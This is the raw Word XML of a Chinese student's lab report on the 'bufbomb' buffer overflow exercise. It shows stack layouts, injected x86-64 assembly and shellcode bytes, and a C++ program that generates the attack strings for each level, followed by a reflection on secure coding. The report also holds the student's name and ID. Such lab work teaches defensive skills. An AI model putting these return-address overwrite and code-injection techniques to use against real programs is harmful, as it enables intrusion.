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097019B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C2556B4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7BDE22"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>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="516589C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 w14:paraId="3F62FF77"/>
    <w:p w14:paraId="53EF5B36"/>
    <w:p w14:paraId="208AFE6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F4FBDAC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="012C1EB2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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A2306A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缓冲区溢出攻击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 w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D280A42">
      <w:pPr>
        <w:ind w:firstLine="354" w:firstLineChars="98"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741E4A59">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49171BA6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="168C9356">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29FD1087"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</w:rPr>
        <w:t xml:space="preserve">计算机科学与技术  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6FCD0D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专业班级 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图灵</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>01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181A6CE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U202315064</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D0931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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>刘铖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 w14:paraId="04A7A38A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 w14:paraId="2E3991DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719DB5FB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5B5133">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C46E479">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36B7D2B8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2024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10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22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日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451BB1BD">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="527E71C8">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781789AC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一、实验目的与要求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0814F5"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通过分析一个程序（称为“缓冲区炸弹”）的构成和运行逻辑，加深对理论课中关于程序的机器级表示、函数调用规则、栈结构等方面知识点的理解，增强反汇编、跟踪、分析、调试等能力，加深对缓冲区溢出攻击原理、方法与防范等方面知识的理解和掌握；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32255F5C">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="360" w:firstLineChars="15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实验环境：Ubuntu，GCC，GDB等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFE7C30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二、实验内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2AC17A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b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">任务  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21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>缓冲区溢出攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222EA87A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程序运行过程中，需要输入特定的字符串，使得程序达到期望的运行效果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF40C80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对一个可执行程序“bufbomb” 实施一系列缓冲区溢出攻击(buffer overflow attacks)，也就是设法通过造成缓冲区溢出来改变该程序的运行内存映像(例如将专门设计的字节序列插入到栈中特定内存位置)和行为，以实现实验预定的目标。bufbomb 目标程序在运行时使用函数 getbuf读入一个字符串。根据不同的任务，学生生成相应的攻击字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4987AC38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实验中需要针对目标可执行程序bufbomb,分别完成多个难度递增的缓冲区溢出攻击(完成的顺序没有固定要求)。按从易到难的顺序，这些难度级分别命名为smoke (level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0)、fizz (level 1)、bang (level 2)、boom (level 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 xml:space="preserve">)和kaboom (level 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)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DB5719"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1、第0级 smoke</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427C300E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正常情况下，getbuf函数运行结束，执行最后的ret指令时，将取出保存于栈帧中的返回（断点）地址并跳转至它继续执行（t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>est</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>函数中调用g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>etbuf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>处）。要求将返回地址的值改为本级别实验的目标smoke函数的首条指令的地址， getbuf函数返回时，跳转到smoke函数执行，即达到了实验的目标。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B396D1A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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">级 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fizz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27182169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要求getbuf函数运行结束后，转到 fizz函数处执行。与smoke的差别是，fizz函数有一个参数。 fizz函数中比较了参数val 与 全局变量c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>ookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>的值，只有两者相同（要正确打印v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>）才能达到目标。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1F28D9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3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 xml:space="preserve">级 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33047743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要求getbuf函数运行结束后，转到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">bang </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>函数执行，并且让全局变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">global_value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>相同（要正确打印global</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>_value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71427D26"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4、第3级 boom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0697BDB8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无感攻击，执行攻击代码后，程序仍然返回到原来的调用函数继续执行，使得调用函数（或者程序用户）感觉不到攻击行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6341A7DB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构造攻击字符串，让函数 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>ge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>将cook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>ie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">值返回给 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">函数，而不是返回值 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>。还原被破坏的栈帧状态，将正确的返回地址压入栈中，并且执行 ret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指令，从而返回到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B133BA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</w:p>
    <w:p w14:paraId="0F5948EB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三、实验记录及问题回答</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8604B8"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（1）实验任务的实验记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75495967">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind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首先尝试进行 smoke 攻击。使用 gdb 调试进入 get_buf 函数，阅读汇编源码容易看出这层函数栈帧大小为64字节。执行到汇编代码的最后一步之后输出栈顶指针的值，然后打开内存窗口查看，发现内存布局如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1440A23D">
      <w:p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125845" cy="1186815"/>
            <wp:effectExtent l="0" t="0" r="571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16A6">
      <w:p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下文描述字节从 0 开始编号，区间左闭右开。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730CEAA4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根据汇编源码，第4-8个字节位置存储的是第二个参数（字符串长度 len)，第8-16个字节存储的是第一个参数（src指针）。第48-64 个字节存着字符串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>”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language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>”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，那么容易知道，事实上第16-48字节是字符数组 buf，共32字节大小。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7353836E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接着进一步查看后16个字节，由代码容易知道前8个字节是 rbp 保存的位置。容易发现后 8 个字节是断点的存放位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BFFFD5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那么直接溢出攻击断点位置即可，使用 objdump 反汇编可执行文件，容易找到 smoke 函数的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EB8A60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在进行 fizz 攻击时，考虑篡改 ebp 保存的位置为 cookie 存储的位置，然后跳转到适当位置使得 ebp 和 cookie 进行比较即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A2447A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在 bang 攻击时，要篡改全局变量，只能植入汇编源码进行攻击。考虑编写汇编源码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430760CD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mov $0x4040ec,%rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC2B6C3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mov $0x4040e8,%rbx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B1259A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mov (%rbx), %ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4741FE0C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mov %ecx, (%rax)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EC000F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pushq $0x401397</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF977B2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ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8C86FA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这份代码篡改了全局变量，并跳转到bang函数中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0262802F">
      <w:p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使用 gcc -c tmp.s 把汇编代码编译成机器码，然后使用 objdump -d tmp.o 把机器码转化成人类可以阅读的形式，再把对应机器码记录下来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0415F899">
      <w:p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用缓冲区溢出的方式将这份机器码写入栈中，并且把断点改为这份代码存放的位置，实现了缓冲区攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4983DA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在boom攻击时，和bang攻击同理，都是注入汇编源码。只要在注入时保证rbp保存的位置不进行改变，再输入源码把rax改为coockie即可。汇编源码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B2539A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mov $0xc0f1538, %rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433AC764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pushq $0x4014aa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD913CD">
      <w:pPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:jc w:val="left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sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1C2DF5"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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C028FA9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>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>）缓冲区溢出攻击中字符串产生的方法描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330CFC3C"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 xml:space="preserve">     要求：一定要画出栈帧结构 （包括断点的存放位置，保存ebp的位置，局部变量的位置等等）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D718E4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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栈帧结构如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002E2EA1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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3956050" cy="4287520"/>
            <wp:effectExtent l="0" t="0" r="571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DF28">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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因此我们注入的代码从buf开始。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3996E2CE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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编写代码便于构造攻击字符串，大体代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288A8908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#include &lt;cstdio&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4405BDE7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#include &lt;cstring&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AB2312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</w:p>
    <w:p w14:paraId="34C87272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using i32 = int;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E186DDB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</w:p>
    <w:p w14:paraId="01457BD1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void print(char *tmp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750902BC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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685CCA82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int len = strlen(tmp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A3A4E2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for (i32 i = len - 2; i &gt;= 0; i -= 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2030F00A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for (i32 j = 0; j &lt; 2; ++j) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761B96BF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putchar(tmp[i + j]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0056B251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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34880B70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putchar(' ');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492395A1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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A680B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C6E075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</w:p>
    <w:p w14:paraId="68E8313B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int main(void)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E60ED8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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5795546D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 xml:space="preserve">for (int i = </w:t>
      </w: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0</w:t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; i &lt; 48; ++i) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B3A7E5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printf("00 ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB6DE3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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC68C69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print("00007fffffffda70");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E1D41E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print("00007fffffffda00");//注入攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AFEA28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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3164DA07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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3368877B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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其中 print 函数是用小端序的方式打印某个数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65821432">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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那么smoke 仅需输出48个 00 后，再用小端序打印出rbp和要跳转的位置，即可完成溢出攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5227DD33">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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fizz 同理，用小端序打印出需要篡改成的 rbp 和要跳转的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED5AE20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bang 和 boom 则只要在最开始把要注入的机器码输出，然后补00满48个字节，然后小端序输出 rbp 与断点即可，代码修改如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09860E64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int main(void)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B642D00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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15071EAC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printf("48 c7 c0 38 15 0f 0c 68 aa 14 40 00 c3 ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056E0C79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for (int i = 13; i &lt; 48; ++i) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D477E66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printf("00 ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1415FD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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008D36BC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print("00007fffffffda70");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1965E012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print("00007fffffffda00");//注入攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5122CCB6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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F893FFD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4"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656E98F9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</w:p>
    <w:p w14:paraId="1C32D678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 w14:paraId="234751C8">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>通过本次缓冲区溢出攻击实验，我对计算机安全及程序执行的底层机制有了更加深刻的理解。在逐级实施攻击任务的过程中，我不仅学习了如何分析程序的运行逻辑，还亲自体验了缓冲区溢出如何被利用来改变程序的控制流。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3385AF21">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>首先，我认识到缓冲区溢出攻击是如何利用程序中的脆弱性进行的。实验中，我观察到函数的栈帧结构及局部变量的存储位置。了解栈的布局和函数调用的规则，使我能够在构造攻击字符串时有的放矢，尤其是在成功修改返回地址以实现跳转时。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C00650">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>其次，使用 GDB 调试工具让我能够实时观察内存和寄存器的变化，这对于理解攻击的成功与否至关重要。我学会了如何通过查看内存布局，准确定位需要覆盖的地址，以及如何在不同的攻击级别中设计合适的输入。这个过程不仅加深了我对汇编语言的理解，也锻炼了我的问题解决能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483BC53E">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>另外，在进行攻击的过程中，我深刻体会到安全编程的重要性。每一次成功的攻击都在提醒我，任何小的疏忽都可能导致程序被恶意利用。因此，了解如何进行攻击的同时，思考如何加强程序的防护措施，如边界检查和数据验证，显得尤为重要。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AF3D21">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>最后，这次实验激发了我对网络安全领域的兴趣。我希望在今后的学习中，继续深入探索其他类型的攻击与防御技术，以更全面地理解计算机系统的安全性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374296B3">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="宋体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>总之，本次实验不仅让我在理论上得到了强化，更通过实践提升了我的分析和调试能力，奠定了我在计算机安全领域发展的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>能力</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>基础</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D262EE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EBFA8D8">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59BD42A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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117E5"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 w14:paraId="751E8760">
    <w:pPr>
      <w:pStyle w:val="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M0NThlNmU2Yzc5ZGU5ODk5MDQ0MmE3ZDgyNWE1OWIifQ=="/>
  </w:docVars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4D02"/>
    <w:rsid w:val="00086807"/>
    <w:rsid w:val="000A016A"/>
    <w:rsid w:val="000A2DE7"/>
    <w:rsid w:val="000B51C0"/>
    <w:rsid w:val="000C2D84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F09FC"/>
    <w:rsid w:val="001F2571"/>
    <w:rsid w:val="00200EC3"/>
    <w:rsid w:val="002021D9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2C0"/>
    <w:rsid w:val="003054E0"/>
    <w:rsid w:val="0031768F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50BB7"/>
    <w:rsid w:val="00555245"/>
    <w:rsid w:val="00555C07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A0D84"/>
    <w:rsid w:val="006B3CD5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97D18"/>
    <w:rsid w:val="007A2B43"/>
    <w:rsid w:val="007A4E13"/>
    <w:rsid w:val="007C7FA3"/>
    <w:rsid w:val="007D2CEF"/>
    <w:rsid w:val="007D62E2"/>
    <w:rsid w:val="0080497D"/>
    <w:rsid w:val="0081169A"/>
    <w:rsid w:val="008124FC"/>
    <w:rsid w:val="00814B9A"/>
    <w:rsid w:val="00815394"/>
    <w:rsid w:val="008155E0"/>
    <w:rsid w:val="00823592"/>
    <w:rsid w:val="00825A2C"/>
    <w:rsid w:val="0084241C"/>
    <w:rsid w:val="00856ADF"/>
    <w:rsid w:val="00857C95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07F1D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61DEF"/>
    <w:rsid w:val="00A70535"/>
    <w:rsid w:val="00A93238"/>
    <w:rsid w:val="00AB584B"/>
